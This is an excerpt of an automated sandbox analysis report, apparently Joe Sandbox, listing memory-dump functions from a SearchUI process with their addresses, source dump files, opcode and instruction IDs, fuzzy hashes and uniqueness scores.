                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601770, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602F70, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600F38, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602F40, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601740, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601F48, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602F48, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602F50, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601F50, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601750, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602F20, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601728, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602F30, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600C08, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601408, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601BE0, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601398, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600B98, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601C80, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601C88, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600488, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602C90, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600C60, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602C68, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602C70, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600C38, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601C38, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602C40, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602C48, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601C50, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
